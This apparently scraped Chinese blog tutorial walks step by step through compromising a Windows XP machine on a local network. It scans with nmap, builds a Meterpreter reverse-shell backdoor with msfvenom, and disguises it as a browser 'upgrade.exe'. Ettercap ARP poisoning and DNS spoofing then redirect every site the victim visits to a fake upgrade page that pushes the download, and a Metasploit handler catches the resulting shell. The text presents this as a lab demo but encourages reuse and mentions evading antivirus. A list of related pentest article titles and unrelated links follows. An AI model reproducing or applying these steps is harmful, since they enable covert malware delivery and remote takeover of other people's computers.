文章来源i春秋

这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图

更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1-1.html
<ignore_js_op> 
这个被框住的IP就是我的目标192.16它8.1.117接下来输入nmap –sC 192.168.1.117这句语句的意思是探测主机类型以及其它信息(nmap非常强大,要多利用)
<ignore_js_op> 
当然这个目标主机我打过补丁了一些漏洞无法利用例如非常流行的MS08-067这个漏洞,好吧不水了上肉戏,接下来就要玩DNS欺骗了不过提前我们要先做个后门程序很简单用一道命令就可以msfVENOM -p  windows/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f exe > /var/www/html/upgrade.exe  IP你可以换成自己的,不过可能被杀,你可以直接手动免杀一下,免杀我就不讲了
<ignore_js_op> 
在终端输入msfconsole启动Metasploit如图
<ignore_js_op> 
再依次输入以下语句
use exploit/multi/handler
set LHOST 192.168.1.116
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
show options
exploit
这些语句的意思是设置自己的ip和端口查看配置启动exploit然后等待程序运行我懒得一个个表明大致说一下就行,接下来就是DNS欺骗了首先找到这个路经etc/ettercap/修改这个文件etter.dns
<ignore_js_op> 
红框圈住的地方是我添加的我的IP地址,你们可以学着我添加不过要是自己主机的IP才可以,修改完后保存一下,然后在转到这个目录/var/www/html/修改这个文件index.html代码如下

[AppleScript] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>请下载进行升级浏览器</title>
</head>
<body>
<script language="javascript">
window.onload = function(){
window.location.href="upgrade.exe";
}
</script>
</body>
</html>

当然你可愿意自己写一些其它的,不过我一般喜欢这种,修改之后再把我们刚开始生产的后门复制到这个目录下/var/www/html/转到终端输入/etc/init.d/apache2 start启动apache2服务器(意思就是把本机当作服务器)接下来转到终端输入ettercap –G进入ettercap图形化界面
<ignore_js_op>                                  <ignore_js_op> 
点解unified sniffing选择网卡点确定 接下来按顺序点scan for hosts和Hosts list扫描和列出主机
<ignore_js_op><ignore_js_op> 
接下来我这里的网关是192.18.1.1我点击一下网关地址再点击Add to target 1然后再点击我要攻击的地址在选择Add to target 2
<ignore_js_op> 
接下来选择mitm中的arp poisoning选项它会弹出一个窗口你直接选择第一个点确定
然后在选择选项跳到这个页面我们玩的是欺骗所以双击dns_spoof
<ignore_js_op> 
再然后我们就选择strat中的start sniffing选项开始DNS欺骗
然后目标主机只要打开网站就会有这种情况,不管访问任何网站
<ignore_js_op> 
接下来对方下载文件运行一下就会启发我们的后门
<ignore_js_op><ignore_js_op>

触发成功后就是这样接下来你先干什么都可以了不过前提你最好会一些dos命令你可以输入shell进入他的系统命令行状态
我这有些乱码 好了 就这样吧 

kali渗透windowsXP过程的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. kali linux 安装过程

    kali linux 安装过程 获取镜像文件 首先需要去官网获取kali linux的镜像文件,本来获取了kali的最新版,由于有些方面还没有得到完善,与VM还没有完全兼容,所以换了视频上的1.0.8 ...

  3. kali渗透综合靶机(一)--Lazysysadmin靶机

    kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...

  4. kali渗透综合靶机(十八)--FourAndSix2靶机

    kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...

  5. kali渗透综合靶机(十七)--HackInOS靶机

    kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一.主机发现 1.netdiscover ...

  6. kali渗透综合靶机(十六)--evilscience靶机

    kali渗透综合靶机(十六)--evilscience靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --ra ...

  7. kali渗透综合靶机(十五)--Breach-1.0靶机

    kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...

  8. kali渗透综合靶机(十四)--g0rmint靶机

    kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...

  9. kali渗透综合靶机(十三)--Dina 1.0靶机

    kali渗透综合靶机(十三)--Dina 1.0靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate= ...

随机推荐

  1. Django 部署(Nginx+uwsgi)

    使用 uwsgi 来部署 安装 uwsgi sudo pip install uwsgi --upgrade 使用 uwsgi 运行项目 uwsgi --http :8001 --chdir /pat ...

  2. Java POI操作Excel注意点

    excel的行索引和列索引都是从0开始,而行号和列号都是从1开始 POI·操作excel基本上都是使用索引 XSSFRow对象的 row.getLastCellNum() 方法返回的是当前行最后有效列 ...

  3. Linux网络编程学习(一) ----- 概论和Linux模型(第一章第二章)

    1.什么是计算机网络,通信方式是什么? 计算机网络就是通过通信线路相互连接的计算机的集合,主要通过双绞线.同轴电缆.电话线或者光缆等有形传输介质通信,还有就是通过激光.微波.卫星等实现无线通信 2.W ...

  4. H5页面input输入框含有键盘自带的表情符时显示异常

    在做一个关于新闻的评论功能的H5页面时,需求里面要求能够发送表情显示表情,如果使用自定义的表情库,则在评论也还要加载大量的表情符图片,极大的影响加载速度,消耗流量,去看了下别的新闻网页版的评论部分也没 ...

  5. 合并数组,改变原数组apply与不改变原数组

    一看见合并数组,可能第一反应就是concat,concat确实具有我们想要的行为,但它实际上并不附加到现有数组,而是创建并返回一个新数组. 同样你也许会想到ES6的扩展运算符...         但 ...

  6. 数据库-1055报错-把only_full_group_by去掉

    [Err] 1055 - Expression #1 of ORDER BY clause is not in GROUP BY clause and contains nonaggregated c ...

  7. Js学习(7)标准库-object对象

    Js原生提供Object对象,O大写,所有的其他对象都继承自Object对象,都是Object的实例 Object对象的原生方法分为两类: 本身的方法:直接定义在Object对象的方法 实例方法:定义 ...

  8. 每月最后一周的周六晚上21:00执行任务-crontab

    0 21 * * 6 /bin/sh /root/time.sh #“6”代表周六 时间判断脚本如下: #!/bin/bash if [ "$(date -d "+7 days&q ...

  9. 获取当前最顶层的ViewController

    - (UIViewController *)topViewController { UIViewController *resultVC; resultVC = [self _topViewContr ...

  10. 14. pt-kill

    pt-kill h=192.168.100.101,P=3306,u=admin,p=admin \--match-user "user01" \--match-host &quo ...